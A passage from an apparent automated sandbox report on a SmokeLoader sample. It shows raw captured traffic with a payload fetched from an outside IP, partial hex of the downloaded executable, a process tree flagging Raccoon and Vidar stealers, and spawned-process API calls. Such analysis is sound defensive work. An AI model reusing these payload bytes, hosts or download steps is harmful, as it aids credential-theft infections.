OKse0P+xvBrLIvdEFDIhIY8o8r60X1gmZ/ohnbXpQ8JqhhEPhXum3LaCJqUsw5H+fV0uQnjyoPpOuw6v8+qNHwLInjsyi+ruaE9SVORTVdFhre+XKcTNsdlklvT32M6HhuiD07rbjCJSieAais8d3ZXtD3zVqh6J63ewsRjH4hcvydJHF
Aug 24, 2021 08:50:15.660196066 CEST	17440	IN	Data Raw: 55 55 77 45 48 61 37 4c 65 56 72 35 4b 31 78 57 53 6b 6c 61 75 4d 75 64 58 53 64 6f 35 2b 30 4d 44 5a 48 78 30 63 38 32 39 43 63 76 63 38 35 50 73 58 4a 79 42 6e 6b 66 55 50 32 62 75 31 57 51 48 35 59 62 4e 49 47 77 5a 69 73 63 52 59 7a 58 64 79 Data Ascii: UUwEHa7LeVr5K1xWSklauMudXSdo5+0MDZHx0c829Ccvc85PsXJyBnkfUP2bu1WQH5YbNIGwZiscRYzXdycL/MDU4yHFLGfd2lGVu331mlnJVZy1GQ71p4x7l20pEpgJZudI7T5TBxOuBoniHWMzOazA4HkCbjj5avM8U2nJiF5yncXM/nQh0RYzTp0F0cCdbsX7sSh2C2NcrG8gYqprWzFB+0IpOdWBsOMtaRvq4ch2SuImDsn
Aug 24, 2021 08:50:15.660213947 CEST	17441	IN	Data Raw: 4a 32 49 4a 35 4c 42 38 45 44 64 6a 66 70 66 72 6b 4e 4a 5a 65 57 67 69 37 58 30 7a 4b 50 45 43 6a 34 77 33 45 73 76 42 76 76 30 66 70 33 59 50 64 6a 5a 68 47 31 7a 79 35 4b 64 75 35 61 48 4a 5a 37 4b 7a 69 4c 77 43 61 67 75 43 35 41 42 4c 78 33 Data Ascii: J2IJ5LB8EDdjfpfrkNJZeWgi7X0zKPECj4w3EsvBvv0fp3YPdjZhG1zy5Kdu5aHJZ7KziLwCaguC5ABLx31u6XRVC01JQPzCldtOLvNtv3Volr3h3AQj8eI7m9v7qwiHXO3JqhTatkOmHNjOqIx0p6/8qmmFnvz36P9OlIiv5QoRX97bpmEg+VkGzBvpDH/ui/R3bxjoSc3ZA7fd/gqCJHmYK+FKothpKU3Qgihv0hFX7sOyBxh
Aug 24, 2021 08:50:15.660224915 CEST	17442	IN	Data Raw: 48 4f 64 44 36 6c 48 45 43 5a 34 45 41 37 52 44 37 72 44 54 39 4b 33 34 35 65 35 42 6f 52 74 2f 4d 74 6a 42 71 32 76 4f 45 6f 6c 47 54 58 72 53 45 6a 30 6b 61 78 35 61 42 45 74 75 69 4a 79 32 6f 47 55 31 49 4e 55 65 69 35 54 6e 76 49 6b 47 6d 67 Data Ascii: HOdD6lHECZ4EA7RD7rDT9K345e5BoRt/MtjBq2vOEolGTXrSEj0kax5aBEtuiJy2oGU1INUei5TnvIkGmgbdbspBdrFCysPtLYTJjeOj
Aug 24, 2021 08:50:15.660461903 CEST	17443	IN	Data Raw: 33 36 37 0d 0a 6e 75 77 59 69 44 68 33 6b 42 2f 58 5a 69 6a 47 59 55 65 4b 54 36 6f 42 74 6a 66 79 59 44 37 6b 69 36 39 4a 35 4c 41 2f 35 43 35 61 51 6a 56 7a 71 47 6e 65 62 78 6b 4d 2f 78 7a 39 51 79 72 32 58 66 55 49 53 73 59 36 50 46 75 67 4d Data Ascii: 367nuwYiDh3kB/XZijGYUeKT6oBtjfyYD7ki69J5LA/5C5aQjVzqGnebxkM/xz9Qyr2XfUISsY6PFugM7sbGvsi+hOplgrEk7rYFxMAHlmb8Th4vbfoUqusiL0s26mCKHmV04qIIU72qrCD/YKEp1THvIZCm1vvTLYA3wxuLxquGyQ7kwgQJo5jhJK1VdL3inQ0htsRLxeNwS9+r2ch5wYmXQ4atpOaTWgSETohlXzK7nhww+
Aug 24, 2021 08:50:15.726234913 CEST	17443	OUT	GET //l/f/SRCFdHsBPvGyIjkLejU_/259f84897d08382fc97b5383558dbe35eed6ef86 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: 188.119.112.104
Aug 24, 2021 08:50:15.964029074 CEST	17460	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 24 Aug 2021 06:50:15 GMT Content-Type: application/octet-stream Content-Length: 916735 Connection: keep-alive Last-Modified: Sat, 10 Jul 2021 15:08:06 GMT ETag: "60e9b7d6-dfcff" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c 00 00 00 c4 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 37 00 00 00 00 00 bc 08 00 00 00 60 0c 00 00 0a 00 00 00 e0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 37 30 00 00 00 00 00 69 02 00 00 00 70 0c 00 00 04 00 00 00 ea 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 d3 1c 00 00 00 80 0c 00 00 1e 00 00 00 ee 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 90 02 00 00 00 a0 0c 00 00 04 00 00 00 0c 0c 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELt\!Zpa H 03.textXXZ`P`.datap`@`.rdata \|@`@.bss(`.edata "@0@.idataH@0.CRT,@0.tls @0.rsrc @0.reloc304@0B/4p@@B/19@B/31 @B/45@@B/57`@0B/70ip@B/81@B/92
Aug 24, 2021 08:50:15.964054108 CEST	17461	IN	Data Raw: 00 00 00 00 00 40 00 10 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: @B
Aug 24, 2021 08:50:15.964160919 CEST	17462	IN	Data Raw: e8 42 1c 09 00 83 ec 0c 85 c0 89 c5 0f 85 5a ff ff ff 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 21 1c 09 00 83 ec 0c 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 fa 1b 09 00 83 ec 0c 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 73 fc Data Ascii: BZ\|$D$4$!\|$D$4$\|$D$4$s\|$D$4$'aT$$tL$(D$ M&T$T$U=at9$a`aQtD$
Aug 24, 2021 08:50:15.964243889 CEST	17464	IN	Data Raw: 04 24 ff d2 c9 c3 31 c0 c3 55 31 c0 ba 01 00 00 00 89 e5 83 ec 10 dd 45 08 dd 5d f0 dd 45 f0 dd 5d f8 dd 45 f0 dd 45 f8 c9 df e9 dd d8 0f 9a c0 0f 45 c2 c3 85 c0 74 4d 0f b6 08 80 b9 60 a4 ea 61 00 89 ca 79 3f 55 80 f9 5b b1 5d 0f 44 d1 b9 01 00 Data Ascii: $1U1E]E]EEEtM`ay?U[]DWVS~8u:TuT0A\0AF[8^_]UWVS1<`a`a)uCu[^_]UEUu1t]]UWVMSU}u1
Aug 24, 2021 08:50:15.964276075 CEST	17465	IN	Data Raw: c0 eb 05 b8 01 00 00 00 83 c4 14 5b 5e 5f 5d c3 55 85 c0 89 e5 79 11 89 c2 f7 da 3d 00 00 00 80 b8 ff ff ff 7f 0f 45 c2 5d c3 55 83 fa 00 89 e5 77 05 83 f8 07 76 07 b9 28 00 00 00 eb 35 83 fa 00 77 07 31 c9 83 f8 01 76 54 b9 28 00 00 00 83 e9 0a Data Ascii: [^_]Uy=E]Uwv(5w1vT(w4v-=v(wvwf/aL]t+UVSX94uDL0911[^]U1@Ht`aiy
Aug 24, 2021 08:50:15.964296103 CEST	17467	IN	Data Raw: ff ff 83 c4 24 5b 5d c3 55 89 e5 53 8d 4d d4 83 ec 30 8b 5a 18 39 58 18 73 15 89 41 10 8b 58 10 85 db 74 06 89 c1 89 d8 eb e8 89 50 10 eb 13 89 51 10 8b 5a 10 85 db 74 06 89 d1 89 da eb d3 89 42 10 8b 45 e4 83 c4 30 5b 5d c3 8b 48 18 8b 50 1c 55 Data Ascii: $[]USM0Z9XsAXtPQZtBE0[]HPUJHQP@J,]UE]@0U1WVMSEu]y4A89tBV1A8;Y$^V0vY$[^_]UWVSM2xur9-\|;]w&9\|
Aug 24, 2021 08:50:15.964315891 CEST	17468	IN	Data Raw: 04 5d c3 55 89 e5 53 89 c3 83 ec 14 8b 40 04 8b 40 38 89 04 24 e8 f0 ee ff ff c6 43 0a 00 83 c4 14 5b 5d c3 55 89 e5 8b 45 08 5d a3 98 8b e9 61 31 c0 c3 55 89 e5 57 56 53 53 80 78 09 00 88 4d f3 74 44 8b 70 04 89 c7 3b 46 4c 74 0b f6 46 16 40 b8 Data Ascii: ]US@@8$C[]UE]a1UWVSSxMtDp;FLtF@u1^Ht(;;t9SuE8CtufN[1Z[^_]xDx2UV1SCD9}DxF@H8Ct@H+CD[^]vBUWVS@$11xC[1

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Aug 24, 2021 08:49:21.175431013 CEST	74.114.154.18	443	192.168.2.5	49716	CN=*.tumblr.com CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US	CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Thu Mar 26 01:00:00 CET 2020 Fri Nov 02 01:00:00 CET 2018 Tue Mar 12 01:00:00 CET 2019	Tue Jun 28 02:00:00 CEST 2022 Wed Jan 01 00:59:59 CET 2031 Mon Jan 01 00:59:59 CET 2029	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
					CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB	CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US	Fri Nov 02 01:00:00 CET 2018	Wed Jan 01 00:59:59 CET 2031
					CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US	CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Tue Mar 12 01:00:00 CET 2019	Mon Jan 01 00:59:59 CET 2029
Aug 24, 2021 08:50:07.726792097 CEST	195.201.225.248	443	192.168.2.5	49727	CN=telecut.in CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US	CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Tue Aug 17 19:31:28 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021	Mon Nov 15 18:31:26 CET 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024	771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0	ce5f3254611a8c095a3d821d44539877
					CN=R3, O=Let's Encrypt, C=US	CN=ISRG Root X1, O=Internet Security Research Group, C=US	Fri Sep 04 02:00:00 CEST 2020	Mon Sep 15 18:00:00 CEST 2025
					CN=ISRG Root X1, O=Internet Security Research Group, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Jan 20 20:14:03 CET 2021	Mon Sep 30 20:14:03 CEST 2024

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: GzsKHwvBmG.exe PID: 5600 Parent PID: 5932

General

Start time:	08:48:11
Start date:	24/08/2021
Path:	C:\Users\user\Desktop\GzsKHwvBmG.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\GzsKHwvBmG.exe'
Imagebase:	0x400000
File size:	153088 bytes
MD5 hash:	25390347B76AF239FD1016A2B090CA89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: GzsKHwvBmG.exe PID: 4440 Parent PID: 5600

General

Start time:	08:48:13
Start date:	24/08/2021
Path:	C:\Users\user\Desktop\GzsKHwvBmG.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\GzsKHwvBmG.exe'
Imagebase:	0x400000
File size:	153088 bytes
MD5 hash:	25390347B76AF239FD1016A2B090CA89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000002.308302159.0000000000530000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000002.308352184.00000000006A1000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: svchost.exe PID: 4952 Parent PID: 556

General

Start time:	08:48:16
Start date:	24/08/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: explorer.exe PID: 3472 Parent PID: 4440

General

Start time:	08:48:20
Start date:	24/08/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff693d90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 2100 Parent PID: 556

General

Start time:	08:48:20
Start date:	24/08/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 4752 Parent PID: 556

General

Start time:	08:48:26
Start date:	24/08/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 5704 Parent PID: 556

General

Start time:	08:48:27
Start date:	24/08/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 5644 Parent PID: 556

General

Start time:	08:48:30
Start date:	24/08/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 5604 Parent PID: 556

General

Start time:	08:48:30
Start date:	24/08/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: SgrmBroker.exe PID: 1280 Parent PID: 556

General

Start time:	08:48:31
Start date:	24/08/2021
Path:	C:\Windows\System32\SgrmBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\SgrmBroker.exe
Imagebase:	0x7ff608080000
File size:	163336 bytes
MD5 hash:	D3170A3F3A9626597EEE1888686E3EA6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 1236 Parent PID: 556

General

Start time:	08:48:31
Start date:	24/08/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 6048 Parent PID: 556

General

Start time:	08:48:37
Start date:	24/08/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 6120 Parent PID: 556

General

Start time:	08:48:50
Start date:	24/08/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: hhiwwui PID: 1008 Parent PID: 904

General

Start time:	08:49:00
Start date:	24/08/2021
Path:	C:\Users\user\AppData\Roaming\hhiwwui
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\hhiwwui
Imagebase:	0x400000
File size:	153088 bytes
MD5 hash:	25390347B76AF239FD1016A2B090CA89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML

Chronological Activities

Analysis Process: hhiwwui PID: 3568 Parent PID: 1008

General

Start time:	08:49:02
Start date:	24/08/2021
Path:	C:\Users\user\AppData\Roaming\hhiwwui
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\hhiwwui
Imagebase:	0x400000
File size:	153088 bytes
MD5 hash:	25390347B76AF239FD1016A2B090CA89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000012.00000002.370106041.00000000004A0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000012.00000002.370292791.00000000005E1000.00000004.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: 1EB.exe PID: 5440 Parent PID: 3472

General

Start time:	08:49:11
Start date:	24/08/2021
Path:	C:\Users\user\AppData\Local\Temp\1EB.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\1EB.exe
Imagebase:	0x400000
File size:	24576 bytes
MD5 hash:	A69E12607D01237460808FA1709E5E86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic

Chronological Activities

Analysis Process: 49B.exe PID: 3092 Parent PID: 3472

General

Start time:	08:49:12
Start date:	24/08/2021
Path:	C:\Users\user\AppData\Local\Temp\49B.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\49B.exe
Imagebase:	0x400000
File size:	439296 bytes
MD5 hash:	C633B1E68DCFFDAE991C3F2D2D4FFFA5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000016.00000000.410473881.000000000046C000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000016.00000000.409608494.0000000004920000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000016.00000003.382884263.00000000049D0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000016.00000000.393584726.000000000046C000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000016.00000000.419422214.000000000046C000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000016.00000000.400296473.000000000046C000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000016.00000000.416098242.0000000004920000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000016.00000002.650305946.0000000004920000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000016.00000000.424554766.0000000004920000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000016.00000000.465918061.0000000004920000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000016.00000000.398407236.0000000004920000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000016.00000000.448938859.0000000004920000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000016.00000000.459235582.000000000046C000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000016.00000000.436435697.000000000046C000.00000040.00020000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML

Chronological Activities

Analysis Process: B72.exe PID: 5864 Parent PID: 3472

General

Start time:	08:49:14
Start date:	24/08/2021
Path:	C:\Users\user\AppData\Local\Temp\B72.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\B72.exe
Imagebase:	0xe60000
File size:	542208 bytes
MD5 hash:	68D5331A8418C4089BB7C0F524C77728
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: svchost.exe PID: 3212 Parent PID: 556

General

Start time:	08:49:15
Start date:	24/08/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: E61.exe PID: 2964 Parent PID: 3472

General

Start time:	08:49:15
Start date:	24/08/2021
Path:	C:\Users\user\AppData\Local\Temp\E61.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\E61.exe
Imagebase:	0x400000
File size:	624640 bytes
MD5 hash:	BF40705CBA9708182B61956985895005
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000019.00000002.458901650.00000000040A0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.457312724.000000000267D000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000019.00000003.389564548.0000000004170000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: GzsKHwvBmG.exe PID: 5600 Parent PID: 5932 GzsKHwvBmG.exeCOMMON

Executed Functions

Function 02DE0110, Relevance: 22.7, APIs: 15, Instructions: 248memorynativethreadCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 02DE0156
GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 02DE016C
CreateProcessA.KERNELBASE(?,00000000), ref: 02DE0255
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02DE0270
